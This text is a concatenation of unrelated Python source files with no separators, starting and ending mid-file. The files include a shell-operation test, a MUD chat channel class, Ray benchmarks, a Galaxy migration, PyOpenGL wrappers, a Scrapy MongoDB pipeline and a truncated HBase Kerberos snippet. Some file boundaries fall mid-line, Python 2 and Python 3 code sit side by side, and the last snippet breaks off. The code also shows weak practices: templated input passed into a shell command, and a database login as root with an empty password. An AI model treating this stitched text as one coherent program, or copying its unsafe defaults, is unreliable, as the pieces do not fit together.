url=url, body=content, status=200) # # ro = RequestOperation('{"method":"get", "url":"{{view_or_url}}"}', # expected_rc=200) # # params = {"view_or_url": url} # cp = ro.execute(context=params, timeout=None) # # self.assertTrue(cp.success) # self.assertEqual(content, cp.stdout) code = """ import signal import time print("START") signal.signal(signal.SIGTERM, lambda x, y: print("SIGTERM called")) signal.signal(signal.SIGINT, lambda x, y: print("SIGINT called")) time.sleep(100) print("END") """ class TestShellOperation(TestCase): @unittest.skipIf(sys.platform.startswith('win'), "no support on Windows") def test_execute(self): mock_context = mock.Mock() mock_context.env = {} so = dimensigon.use_cases.operations.ShellOperation('echo -n "{{input.message}}"', expected_stdout=None, expected_rc=None, system_kwargs={}) cp = so._execute(dict(input={'message': 'this is a test message'}), context=mock_context) self.assertTrue(cp.success) self.assertEqual('this is a test message', cp.stdout) self.assertIsNone(cp.stderr) self.assertEqual(0, cp.rc) so = dimensigon.use_cases.operations.ShellOperation('sleep 10', expected_stdout=None, expected_rc=None, system_kwargs={}) cp = so._execute(dict(input={}), context=mock_context, timeout=0.01) self.assertFalse(cp.success) self.assertIsNone(cp.stdout) self.assertEqual('Timeout of 0.01 seconds while executing shell', cp.stderr) self.assertIsNone(cp.rc) """ Channel The channel class represents the out-of-character chat-room usable by Players in-game. It is mostly overloaded to change its appearance, but channels can be used to implement many different forms of message distribution systems. Note that sending data to channels are handled via the CMD_CHANNEL syscommand (see evennia.syscmds). The sending should normally not need to be modified. """ from evennia.comms.models import TempMsg from evennia.comms.comms import DefaultChannel from evennia.utils.utils import make_iter from muddery.server.utils.localized_strings_handler import _ from muddery.server.utils.defines import ConversationType class MudderyChannel(DefaultChannel): """ Working methods: at_channel_creation() - called once, when the channel is created has_connection(player) - check if the given player listens to this channel connect(player) - connect player to this channel disconnect(player) - disconnect player from channel access(access_obj, access_type='listen', default=False) - check the access on this channel (default access_type is listen) delete() - delete this channel message_transform(msg, emit=False, prefix=True, sender_strings=None, external=False) - called by the comm system and triggers the hooks below msg(msgobj, header=None, senders=None, sender_strings=None, persistent=None, online=False, emit=False, external=False) - main send method, builds and sends a new message to channel. tempmsg(msg, header=None, senders=None) - wrapper for sending non-persistent messages. distribute_message(msg, online=False) - send a message to all connected players on channel, optionally sending only to players that are currently online (optimized for very large sends) Useful hooks: channel_prefix(msg, emit=False) - how the channel should be prefixed when returning to user. Returns a string format_senders(senders) - should return how to display multiple senders to a channel pose_transform(msg, sender_string) - should detect if the sender is posing, and if so, modify the string format_external(msg, senders, emit=False) - format messages sent from outside the game, like from IRC format_message(msg, emit=False) - format the message body before displaying it to the user. 'emit' generally means that the message should not be displayed with the sender's name. pre_join_channel(joiner) - if returning False, abort join post_join_channel(joiner) - called right after successful join pre_leave_channel(leaver) - if returning False, abort leave post_leave_channel(leaver) - called right after successful leave pre_send_message(msg) - runs just before a message is sent to channel post_send_message(msg) - called just after message was sent to channel """ def channel_prefix(self, msg=None, emit=False, **kwargs): """ Hook method. How the channel should prefix itself for users. Args: msg (str, optional): Prefix text emit (bool, optional): Switches to emit mode, which usually means to not prefix the channel's info. Returns: prefix (str): The created channel prefix. """ return '' if emit else '[%s] ' % _(self.key, category="channels") def get_message(self, caller, message): """ Receive a message from a character. :param caller: talker. :param message: content. """ if not self.access(caller, "send"): caller.msg(_("You can not talk in this channel.")) return output = { "conversation": { "type": ConversationType.CHANNEL.value, "channel": _(self.key, category="channels"), "from_id": caller.get_id(), "from_name": caller.get_name(), "msg": message, } } msgobj = TempMsg(message=output, channels=[self]) self.msg(msgobj, emit=True) def msg( self, msgobj, header=None, senders=None, sender_strings=None, keep_log=None, online=False, emit=False, external=False, ): """ Send the given message to all accounts connected to channel. Note that no permission-checking is done here; it is assumed to have been done before calling this method. The optional keywords are not used if persistent is False. Args: msgobj (Msg, TempMsg or str): If a Msg/TempMsg, the remaining keywords will be ignored (since the Msg/TempMsg object already has all the data). If a string, this will either be sent as-is (if persistent=False) or it will be used together with `header` and `senders` keywords to create a Msg instance on the fly. header (str, optional): A header for building the message. senders (Object, Account or list, optional): Optional if persistent=False, used to build senders for the message. sender_strings (list, optional): Name strings of senders. Used for external connections where the sender is not an account or object. When this is defined, external will be assumed. keep_log (bool or None, optional): This allows to temporarily change the logging status of this channel message. If `None`, the Channel's `keep_log` Attribute will be used. If `True` or `False`, that logging status will be used for this message only (note that for unlogged channels, a `True` value here will create a new log file only for this message). online (bool, optional) - If this is set true, only messages people who are online. Otherwise, messages all accounts connected. This can make things faster, but may not trigger listeners on accounts that are offline. emit (bool, optional) - Signals to the message formatter that this message is not to be directly associated with a name. external (bool, optional): Treat this message as being agnostic of its sender. Returns: success (bool): Returns `True` if message sending was successful, `False` otherwise. """ senders = make_iter(senders) if senders else [] if isinstance(msgobj, str): # given msgobj is a string - convert to msgobject (always TempMsg) msgobj = TempMsg(senders=senders, header=header, message=msgobj, channels=[self]) # we store the logging setting for use in distribute_message() msgobj.keep_log = keep_log if keep_log is not None else self.db.keep_log # start the sending msgobj = self.pre_send_message(msgobj) if not msgobj: return False msgobj = self.message_transform( msgobj, emit=emit, prefix=False, sender_strings=sender_strings, external=external ) self.distribute_message(msgobj, online=online) self.post_send_message(msgobj) return True from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np import pytest import ray from ray.tests.conftest import _ray_start_cluster num_tasks_submitted = [10**n for n in range(0, 6)] num_tasks_ids = ["{}_tasks".format(i) for i in num_tasks_submitted] @ray.remote def dummy_task(val): return val def benchmark_task_submission(num_tasks): total_tasks = 100000 for _ in range(total_tasks // num_tasks): ray.get([dummy_task.remote(i) for i in range(num_tasks)]) def warmup(): x = np.zeros(10**6, dtype=np.uint8) for _ in range(5): for _ in range(5): ray.put(x) for _ in range(5): ray.get([dummy_task.remote(0) for _ in range(1000)]) @pytest.mark.benchmark @pytest.mark.parametrize("num_tasks", num_tasks_submitted, ids=num_tasks_ids) def test_task_submission(benchmark, num_tasks): num_cpus = 16 ray.init( num_cpus=num_cpus, object_store_memory=10**7, ignore_reinit_error=True) # warm up the plasma store warmup() benchmark(benchmark_task_submission, num_tasks) ray.shutdown() def benchmark_task_forward(f, num_tasks): ray.get([f.remote() for _ in range(num_tasks)]) @pytest.mark.benchmark @pytest.mark.parametrize( "num_tasks", [10**3, 10**4], ids=[str(num) + "_tasks" for num in [10**3, 10**4]]) def test_task_forward(benchmark, num_tasks): with _ray_start_cluster(num_cpus=16, object_store_memory=10**6) as cluster: cluster.add_node(resources={"my_resource": 100}) ray.init(redis_address=cluster.redis_address) @ray.remote(resources={"my_resource": 0.001}) def f(): return 1 # Warm up ray.get([f.remote() for _ in range(100)]) benchmark(benchmark_task_forward, f, num_tasks) backend/akastories/admin.py from django.contrib import admin from .models import StoryUser # Register your models here. class StoryUserAdmin(admin.ModelAdmin): list_display = ('nim', 'username', 'updated_at') admin.site.register(StoryUser, StoryUserAdmin) igorhollaender/sirv_dashboard """ Migration script to add the cleanup_event* tables. """ import datetime import logging import sys from sqlalchemy import Column, DateTime, ForeignKey, Integer, MetaData, Table from galaxy.model.custom_types import TrimmedString now = datetime.datetime.utcnow log = logging.getLogger( __name__ ) log.setLevel( logging.DEBUG ) handler = logging.StreamHandler( sys.stdout ) format = "%(name)s %(levelname)s %(asctime)s %(message)s" formatter = logging.Formatter( format ) handler.setFormatter( formatter ) log.addHandler( handler ) metadata = MetaData() # New table to log cleanup events CleanupEvent_table = Table( "cleanup_event", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "message", TrimmedString( 1024 ) ) ) CleanupEventDatasetAssociation_table = Table( "cleanup_event_dataset_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "dataset_id", Integer, ForeignKey( "dataset.id" ), index=True ) ) CleanupEventMetadataFileAssociation_table = Table( "cleanup_event_metadata_file_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "metadata_file_id", Integer, ForeignKey( "metadata_file.id" ), index=True ) ) CleanupEventHistoryAssociation_table = Table( "cleanup_event_history_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "history_id", Integer, ForeignKey( "history.id" ), index=True ) ) CleanupEventHistoryDatasetAssociationAssociation_table = Table( "cleanup_event_hda_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "hda_id", Integer, ForeignKey( "history_dataset_association.id" ), index=True ) ) CleanupEventLibraryAssociation_table = Table( "cleanup_event_library_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "library_id", Integer, ForeignKey( "library.id" ), index=True ) ) CleanupEventLibraryFolderAssociation_table = Table( "cleanup_event_library_folder_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "library_folder_id", Integer, ForeignKey( "library_folder.id" ), index=True ) ) CleanupEventLibraryDatasetAssociation_table = Table( "cleanup_event_library_dataset_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "library_dataset_id", Integer, ForeignKey( "library_dataset.id" ), index=True ) ) CleanupEventLibraryDatasetDatasetAssociationAssociation_table = Table( "cleanup_event_ldda_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "ldda_id", Integer, ForeignKey( "library_dataset_dataset_association.id" ), index=True ) ) CleanupEventImplicitlyConvertedDatasetAssociationAssociation_table = Table( "cleanup_event_icda_association", metadata, Column( "id", Integer, primary_key=True ), Column( "create_time", DateTime, default=now ), Column( "cleanup_event_id", Integer, ForeignKey( "cleanup_event.id" ), index=True, nullable=True ), Column( "icda_id", Integer, ForeignKey( "implicitly_converted_dataset_association.id" ), index=True ) ) def upgrade(migrate_engine): metadata.bind = migrate_engine print __doc__ metadata.reflect() try: CleanupEvent_table.create() CleanupEventDatasetAssociation_table.create() CleanupEventMetadataFileAssociation_table.create() CleanupEventHistoryAssociation_table.create() CleanupEventHistoryDatasetAssociationAssociation_table.create() CleanupEventLibraryAssociation_table.create() CleanupEventLibraryFolderAssociation_table.create() CleanupEventLibraryDatasetAssociation_table.create() CleanupEventLibraryDatasetDatasetAssociationAssociation_table.create() CleanupEventImplicitlyConvertedDatasetAssociationAssociation_table.create() except Exception, e: log.debug( "Creating table failed: %s" % str( e ) ) def downgrade(migrate_engine): metadata.bind = migrate_engine metadata.reflect() try: CleanupEventImplicitlyConvertedDatasetAssociationAssociation_table.drop() CleanupEventLibraryDatasetDatasetAssociationAssociation_table.drop() CleanupEventLibraryDatasetAssociation_table.drop() CleanupEventLibraryFolderAssociation_table.drop() CleanupEventLibraryAssociation_table.drop() CleanupEventHistoryDatasetAssociationAssociation_table.drop() CleanupEventHistoryAssociation_table.drop() CleanupEventMetadataFileAssociation_table.drop() CleanupEventDatasetAssociation_table.drop() CleanupEvent_table.drop() except Exception, e: log.debug( "Dropping table failed: %s" % str( e ) ) appasahebs/bzTakeHome from django.views import generic from django.http import HttpResponse from backfill.models import Backfill class BackfillView(generic.ListView): def get(self, request, *args, **kwargs): Backfill.populate() return HttpResponse('Backfill of data done for articles!') '''OpenGL extension ATI.vertex_streams This module customises the behaviour of the OpenGL.raw.GL.ATI.vertex_streams to provide a more Python-friendly API Overview (from the spec) This extension adds the ability to handle sets of auxilliary vertex and normal coordinates. These sets of auxilliary coordinates are termed streams, and can be routed selectively into the blend stages provided by the vertex blending extension. This functionality enables software animation techniques such as keyframe vertex morphing. The official definition of this extension is available here: http://www.opengl.org/registry/specs/ATI/vertex_streams.txt ''' from OpenGL import platform, constant, arrays from OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.ATI.vertex_streams import * from OpenGL.raw.GL.ATI.vertex_streams import _EXTENSION_NAME def glInitVertexStreamsATI(): '''Return boolean indicating whether this extension is available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME ) glVertexStream1svATI=wrapper.wrapper(glVertexStream1svATI).setInputArraySize( 'coords', 1 ) glVertexStream1ivATI=wrapper.wrapper(glVertexStream1ivATI).setInputArraySize( 'coords', 1 ) glVertexStream1fvATI=wrapper.wrapper(glVertexStream1fvATI).setInputArraySize( 'coords', 1 ) glVertexStream1dvATI=wrapper.wrapper(glVertexStream1dvATI).setInputArraySize( 'coords', 1 ) glVertexStream2svATI=wrapper.wrapper(glVertexStream2svATI).setInputArraySize( 'coords', 2 ) glVertexStream2ivATI=wrapper.wrapper(glVertexStream2ivATI).setInputArraySize( 'coords', 2 ) glVertexStream2fvATI=wrapper.wrapper(glVertexStream2fvATI).setInputArraySize( 'coords', 2 ) glVertexStream2dvATI=wrapper.wrapper(glVertexStream2dvATI).setInputArraySize( 'coords', 2 ) glVertexStream3svATI=wrapper.wrapper(glVertexStream3svATI).setInputArraySize( 'coords', 3 ) glVertexStream3ivATI=wrapper.wrapper(glVertexStream3ivATI).setInputArraySize( 'coords', 3 ) glVertexStream3fvATI=wrapper.wrapper(glVertexStream3fvATI).setInputArraySize( 'coords', 3 ) glVertexStream3dvATI=wrapper.wrapper(glVertexStream3dvATI).setInputArraySize( 'coords', 3 ) glVertexStream4svATI=wrapper.wrapper(glVertexStream4svATI).setInputArraySize( 'coords', 4 ) glVertexStream4ivATI=wrapper.wrapper(glVertexStream4ivATI).setInputArraySize( 'coords', 4 ) glVertexStream4fvATI=wrapper.wrapper(glVertexStream4fvATI).setInputArraySize( 'coords', 4 ) glVertexStream4dvATI=wrapper.wrapper(glVertexStream4dvATI).setInputArraySize( 'coords', 4 ) glNormalStream3bvATI=wrapper.wrapper(glNormalStream3bvATI).setInputArraySize( 'coords', 3 ) glNormalStream3svATI=wrapper.wrapper(glNormalStream3svATI).setInputArraySize( 'coords', 3 ) glNormalStream3ivATI=wrapper.wrapper(glNormalStream3ivATI).setInputArraySize( 'coords', 3 ) glNormalStream3fvATI=wrapper.wrapper(glNormalStream3fvATI).setInputArraySize( 'coords', 3 ) glNormalStream3dvATI=wrapper.wrapper(glNormalStream3dvATI).setInputArraySize( 'coords', 3 ) ### END AUTOGENERATED SECTIONnandana/kbqa-relation-linking import json import torch from collections import Counter from opennre.encoder.bert_encoder import BERTEntityEncoder from opennre.model.ranking_nn import RankingNN from relation_linking_core.rel_linker_modules.rel_linker_module import RelModule class NeuralRelationLinking(RelModule): question_terms = ['what', 'when', 'which', 'who', 'how', 'list', 'give', 'show', 'do', 'does'] def __init__(self, config): rel_id_path = "/Users//Src/relation-linking/data/lcquad/rel2id.json" rel2id = json.load(open(rel_id_path)) pretrain_path = "/Users//Src/relation-linking/data/bert-base-uncased" ckpt_path = "/Users//Src/relation-linking/data/lcquad/nre4qald_v4_10_bertentity_softmax.pth.tar" sentence_encoder = BERTEntityEncoder(max_length=80, pretrain_path=pretrain_path) print("Loading neural model ...\n\trel2id path: {}\n\trels: {}\n\tpretrain_path: {}\n\tckpt: {}". format(rel_id_path, len(rel2id), pretrain_path, ckpt_path)) self.neural_model = RankingNN(sentence_encoder, len(rel2id), rel2id) if torch.cuda.is_available(): self.neural_model.load_state_dict(torch.load(ckpt_path, map_location='cuda')['state_dict']) self.neural_model.cuda() else: self.neural_model.load_state_dict(torch.load(ckpt_path, map_location='cpu')['state_dict']) with torch.no_grad(): self.neural_model.r_hiddens = self.neural_model.forward_all_relations() def get_relation_candidates(self, triple_data, params=None): relation_scores = Counter() normalized_to_surface_form = params['normalized_to_surface_form'] subj_text, subj_type = triple_data['subj_text'], triple_data['subj_type'] obj_text, obj_type = triple_data['obj_text'], triple_data['obj_type'] head = subj_text if subj_text else subj_type tail = obj_text if obj_text else obj_type if triple_data['amr_unknown_var'] == triple_data['subj_id'] or head == 'amr-unknown' or head == 'unknown': amr_unkown = head elif triple_data['amr_unknown_var'] == triple_data['obj_id'] or tail == 'amr-unknown' or tail == 'unknown': amr_unkown = tail else: amr_unkown = None print("OpenNRE:\n\thead: {}\n\ttail: {}\n\tamr-unknown: {}".format(head, tail, amr_unkown)) input = NeuralRelationLinking.prepare_opennre_input(triple_data['text'], head, tail, normalized_to_surface_form, amr_unkown) if input: openre_response = self.neural_model.infer_ranking(input) opennre_relations = [(rel[0], rel[1]) for rel in openre_response[:10]] for rel in opennre_relations: relation_scores[rel[0]] += rel[1] print("\topennre relations: {}".format(opennre_relations)) else: print("\topennre input error:\n\tsent: {}\n\th: {} \t: {}".format(triple_data['text'], head, tail)) return relation_scores @classmethod def prepare_opennre_input(cls, sentence, head, tail, normalized_to_surface_form, amr_unkown): sentence = sentence.lower() head_start, tail_start = sentence.find(head.lower()), sentence.find(tail.lower()) if head_start == -1: if head in normalized_to_surface_form: head_start = sentence.find(normalized_to_surface_form[head].lower()) if head_start == -1 and amr_unkown == head: for term in NeuralRelationLinking.question_terms: head_start = sentence.find(term) if head_start != -1: head = term break if tail_start == -1: if tail in normalized_to_surface_form: tail_start = sentence.find(normalized_to_surface_form[tail].lower()) if tail_start == -1 and amr_unkown == tail: for term in NeuralRelationLinking.question_terms: tail_start = sentence.find(term) if tail_start != -1: tail = term break if head_start == -1 or tail_start == -1: return else: head_end, tail_end = head_start + len(head) + 1, tail_start + len(tail) + 1 return {"text": sentence, "h": {"pos": (head_start, head_end)}, "t": {"pos": (tail_start, tail_end)}} from ippa import Process class RelatedIllness(Process): def find_new_state(self, events, ti): if 'RelatedDz' in events: return events['RelatedDz'][0].Type else: return False search_service/search/pagination.py import logging from django.conf import settings from rest_framework.pagination import PageNumberPagination from rest_framework.response import Response logger = logging.getLogger(__name__) class MadocPagination(PageNumberPagination): """ Pagination class for Madoc results "pagination": { "page": 1, "totalPages": 35, "totalResults": 830 } """ page_size_query_param = "page_size" max_page_size = settings.MAX_PAGE_SIZE def get_paginated_response(self, data): return Response( { "pagination": { "page": self.page.number, "pageSize": self.page.paginator.per_page, "next": self.get_next_link(), "previous": self.get_previous_link(), "totalPages": self.page.paginator.num_pages, "totalResults": self.page.paginator.count, }, "results": data, } ) tools/ks-package-list.py #!/usr/bin/python3 import sys import argparse import pykickstart import pykickstart.parser import pykickstart.version import dnf import dnf.transaction PKG_FORMAT = "{name}-{version}-{release}.{arch}" # Command line parsing argparser = argparse.ArgumentParser(description='List kickstart package dependencies.') argparser.add_argument('kickstart_file', metavar='KICKSTART', help='The kickstart file to parse') argparser.add_argument('--releasever', metavar='RELEASEVER', help='release version', type=int, required=False) argparser.add_argument('--format', metavar='FORMAT', help='package format (default is '+ PKG_FORMAT +')', required=False) argparser.add_argument('--verbose', help='print additional info to stderr', action='store_true') args = argparser.parse_args() # Kickstart parsing ksparser = pykickstart.parser.KickstartParser(pykickstart.version.makeVersion()) ksparser.readKickstart(args.kickstart_file) # Base object for dnf operations: https://dnf.readthedocs.io/en/latest/api.html dnf_base = dnf.Base() # Set release version if any if args.releasever: if args.verbose: print(f'# Setting release version to {args.releasever}', file=sys.stderr) dnf_base.conf.releasever = args.releasever if args.verbose: print(f'# Exclude weak dependencies: {ksparser.handler.packages.excludeWeakdeps}', file=sys.stderr) dnf_base.conf.install_weak_deps = not ksparser.handler.packages.excludeWeakdeps # Create parser for kickstart 'repo' command repoparser = argparse.ArgumentParser(prog='repo', description='Kickstart repo command') repoparser.add_argument('--name', required=True) repourl_opt = repoparser.add_mutually_exclusive_group() repourl_opt.add_argument('--baseurl', required=False) repourl_opt.add_argument('--metalink', required=False) repourl_opt.add_argument('--mirrorlist', required=False) # Parse repo list from kickstart file repolist = ksparser.handler.commands['repo'].dataList() if repolist: if args.verbose: print(f'# Processing {len(repolist)} repositories', file=sys.stderr) for repocmd in ksparser.handler.commands['repo'].dataList(): if args.verbose: print(f"# {repocmd}".strip(), file=sys.stderr) repoargs = repoparser.parse_args(args=f"{repocmd}".split()[1:]) repourls = {} if repoargs.baseurl: repourls['baseurl'] = repoargs.baseurl if repoargs.metalink: repourls['metalink'] = repoargs.metalink if repoargs.mirrorlist: repourls['mirrorlist'] = repoargs.mirrorlist # Add repo to current configuration dnf_base.repos.add_new_repo(repoid=repoargs.name.strip('"'), conf=dnf_base.conf, **repourls) elif args.verbose: print('# No repository command in kickstart file', file=sys.stderr) # Dump config # print(f"# Config: {dnf_base.conf.dump()}", file=sys.stderr) # Retrieve metadata information about all known packages dnf_base.fill_sack(load_system_repo=False) # Retrieve metadata information about all known groups dnf_base.read_comps() # Resolves package list from name def resolvePackage(pkg_name): return dnf_base.sack.query().filter(name__glob=pkg_name, latest_per_arch=True) # Process kickstart required groups for group in ksparser.handler.packages.groupList: resolved_group = dnf_base.comps.group_by_pattern(group.name) if resolved_group: # Add group to install transaction found = dnf_base.group_install(resolved_group.id, dnf_base.conf.group_package_types) if args.verbose: print(f"# Including {found} packages from group {group}", file=sys.stderr) else: print(f"# Warning: cannot find required group {group.name}", file=sys.stderr) # Process kickstart excluded packages excluded_list = ksparser.handler.packages.excludedList if args.verbose: print(f"# Processing {len(excluded_list)} explicitly excluded packages: {excluded_list}", file=sys.stderr) for pkg in excluded_list: resolved = resolvePackage(pkg) if not resolved and args.verbose: print(f"# Warning: cannot find excluded package {pkg}", file=sys.stderr) # Process kickstart required packages included_list = ksparser.handler.packages.packageList for pkg in included_list: resolved = resolvePackage(pkg) if not resolved: print(f"# Warning: cannot find required package {pkg}", file=sys.stderr) # Resolve install dependencies dnf_base.install_specs(included_list, exclude=excluded_list) dnf_base.resolve() # Print formatted results pkg_format = PKG_FORMAT if args.format: pkg_format = args.format for pkg in sorted(dnf_base.transaction.install_set): print(pkg_format.format(name=pkg.name,epoch=pkg.epoch,version=pkg.version,release=pkg.release,arch=pkg.arch)) 1-10 # -*- coding: utf-8 -*- from pymongo import MongoClient from scrapy import logformatter import traceback from scrapy.exceptions import DropItem class MongodbPipeline(object): MONGODB_SERVER = '172.16.17.32' MONGODB_PORT = 27017 MONGODB_DB = 'JayMongo' MONGODB_USER = 'root' MONGODB_PWD = '' def __init__(self): try: self.client = MongoClient(host=self.MONGODB_SERVER, port=self.MONGODB_PORT) self.db = self.client[self.MONGODB_DB] self.db.authenticate(name=self.MONGODB_USER, password=self.MONGODB_PWD) self.col = self.db["movie_content"] except Exception: traceback.print_exc() @classmethod def from_crawler(cls, crawler): cls.MONGODB_SERVER = crawler.settings.get('SingleMONGODB_SERVER', '172.16.17.32') cls.MONGODB_PORT = crawler.settings.getint('SingleMONGODB_PORT', 27017) cls.MONGODB_DB = crawler.settings.get('SingleMONGODB_DB', 'JayMongo') cls.MONGODB_USER = crawler.settings.get('SingleMONGODB_USER', 'root') cls.MONGODB_PWD = crawler.settings.get('SingleMONGODB_PWD', '') pipe = cls() pipe.crawler = crawler return pipe def process_item(self, item, spider): # if item['a'] == 0: # raise DropItem("Duplicate item found: %s" % item) movie_detail = { 'url': item.get('url'), 'title': item.get('title'), 'director': item.get('director'), 'screenwriter': item.get('screenwriter'), 'actors': item.get('actors'), 'category': item.get('category'), 'country': item.get('country'), 'langrage': item.get('langrage'), 'initial': item.get('initial'), 'runtime': item.get('runtime'), 'playUrl': item.get('playUrl'), 'rate': item.get('rate'), 'starPeople': item.get('starPeople'), 'preShowUrl': item.get('preShowUrl'), 'intro': item.get('intro'), 'icon': item.get('icon') } result = self.col.insert(movie_detail) print('[success] insert ' + item['url'] + ' title:' + item['title']) return item jbytecode/pygenprogtest/testfindrule.py import unittest from gp import * from interpreter import * class TestFindRule(unittest.TestCase): funclist = [LessThanFunction("<", 4), BiggerThanFunction(">", 4)] constantlist = [] varlist = {"x1": 0, "x2": 0} def fitness (self, code): # The rule is # if x1 > x2 then return x1 # else if x2 > x1 then return x2 x1 = [1, 4, 5, 8] x2 = [2, 3, 6, 7] y = [2, 4, 6, 8] total = 0.0 for i in range(len(x1)): resulti = postfixeval( code, self.funclist, {"x1": x1[i], "x2": x2[i]})[0] total = total + math.pow(y[i] - resulti, 2.0) return -total def testFindRule(self): gp = GP(self.fitness, self.funclist, self.varlist, self.constantlist, popsize = 100, deep = 1, maxdeep = 1) gp.createRandomPopulation() gp.iterateN(100) gp.sortPopulation() self.assertTrue(gp.chromosomes[0].code in [ ['x1', 'x2', 'x1', 'x2', '>'], ['x2', 'x1', 'x2', 'x1', '>'], ['x2', 'x1', 'x1', 'x2', '<'], ['x1', 'x2', 'x2', 'x1', '<'] ])1-10 import json from arq.jobs import Job from fastapi import APIRouter from starlette.requests import Request router = APIRouter() async def test(request: Request): job = await request.app.state.arq_redis.enqueue_job('say_hello', name="wt", _queue_name="arq:queue1") job_ = await job.info() return {"job_": job_} async def get_queue_health_check(request: Request, queue_name="arq:queue3"): workers = await request.app.state.arq_redis.all_workers() queues_ = set([json.loads(v).get("queue_name") for k, v in workers.items()]) # print(workers) # print(queues_) __ = [] for queue_name in queues_: r = await request.app.state.arq_redis._get_health_check(queue_name=f"{queue_name}:health-check") r_ = json.loads(r) workers_ = [json.loads(v).get("worker_consumer_name") for k, v in workers.items() if json.loads(v).get("queue_name") == queue_name] r_.update({"queue_name": queue_name, "workers": workers_}) __.append(r_) return {"code": 20000, "result": __,"total":len(__)} async def queued_jobs(request: Request, queue_name="arq:queue3"): queued_jobs_ = await request.app.state.arq_redis.queued_jobs(queue_name=queue_name) queued_jobs__ = [] for queued_job_ in queued_jobs_: state = await Job(job_id=queued_job_.__dict__.get("job_id"), redis=request.app.state.arq_redis, _queue_name=queue_name).status() queued_job_.__dict__.update({"state": state}) queued_jobs__.append(queued_job_) results = await request.app.state.arq_redis.all_job_results() results_ = [] for result in results: if result.__dict__.get("queue_name") == queue_name: result.__dict__.update({"state": "complete"}) results_.append(result) __ = results_ + queued_jobs__ # queued_num = len([job_ for job_ in __ if job_.__dict__.get("state") == "queued"]) # in_progress_num = len([job_ for job_ in __ if job_.__dict__.get("state") == "in_progress"]) # deferred_num = len([job_ for job_ in __ if job_.__dict__.get("state") == "deferred"]) # complete_num = len([job_ for job_ in __ if job_.__dict__.get("state") == "complete"]) # print(queued_num, in_progress_num, deferred_num, complete_num) return { "code": 20000, "queued_jobs__": __ } router.add_api_route(methods=['GET'], path="/test", endpoint=test, summary="test") router.add_api_route(methods=['GET'], path="/get_queue_health_check", endpoint=get_queue_health_check, summary="get_queue_health_check") router.add_api_route(methods=['GET'], path="/queued_jobs", endpoint=queued_jobs, summary="queued_jobs") scripts/errors.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Mon May 6 22:17:15 2019 @authors: , , File Description: The errors file is used to calculate the various types of errors that are used in this dataset. Localization Error is the euclidean distance between each latitude and longitude measurement for the prediction and truth. The Number of Misclassified is the number of missclassified samples. Standard Error is the error defined by the creators of the dataset for the IPIN2015 competition. In this competition building missclassifications were penalized by 50 meters each and floor missclassifications were penatlized by 4 meters each. The Standard Error is given by the pentalties multiplied by the number of missclassifcations plus the Localization Error. Finally there is a coordinate probability error that calculated the probability of being under 10 meters. The main function here is compute_errors while everything else is a helper function. """ #Libraries from numpy import sqrt, square, sum # Hyper-parameters / CONSTANTS BP = 50 # Default Building Penalty FP = 4 # Default Floor Penalty COORDS_PROB = 10 # meters def localizaion_error(prediction, truth): ''' Computes the Localization Error by computing the euclidean distance between the predicted latitude and longitude and the true latitude and longitude. Parameters: prediction : (Dataframe) truth : (Dataframe) Returns: error : (array) error between each sample ''' x, y = prediction['LONGITUDE'].values, prediction['LATITUDE'].values x0, y0 = truth['LONGITUDE'].values, truth['LATITUDE'].values error = sqrt(square(x - x0) + square(y - y0)) return error def number_missclassified(prediction, truth, column_name): ''' Computes the number of missclassifications by summing how many elements do not match between the prediction and truth columns. The column_name parameter is there because this can be used for the Floor or the Building. Parameters: prediction : (Dataframe) truth : (Dataframe) column_name : (str) specifies which column to compute the error Returns: error : (int) total number of missclassifications. ''' error = sum(prediction[column_name].values != truth[column_name].values) return error def compute_errors(prediction, truth, building_penalty=BP, floor_penalty=FP): ''' Computes the missclassification errors, localization error, and standard error and coordiante error probability for being under 10 meters. For more detail, see the File Description. Parameters: prediction : (Dataframe) truth : (Dataframe) building_penalty : (int) floor_penalty : (int) Returns: errors : (tuple) contains all error types ''' build_missclass = number_missclassified(prediction, truth, "BUILDINGID") floor_missclass = number_missclassified(prediction, truth, "FLOOR") coords_error = localizaion_error(prediction, truth) standard_error = (building_penalty * build_missclass + floor_penalty * floor_missclass + sum(coords_error)) coords_error_prob = (coords_error[coords_error < COORDS_PROB].shape[0] / coords_error.shape[0] * 100) errors = (build_missclass, floor_missclass, coords_error, standard_error, coords_error_prob) return errorsnum1 = int(input('Digite um numero: ')) num2 = int(input('Digite outro numero: ')) if num1 > num2: print('O numero {} è maior que {}'.format(num1, num2)) elif num2 > num1: print('O numero {} é maior que {}'.format(num2, num1)) elif num1 == num2: print('Os dois numeros sao iguais!!') from thrift.transport import THttpClient from thrift.protocol import TBinaryProtocol from hbase.Hbase import Client from subprocess import call import ssl import kerberos def kerberos_auth(): call("kdestroy",shell="True") clientPrincipal='hbase/c2677-node4.coelab.cloa.com@CO.' 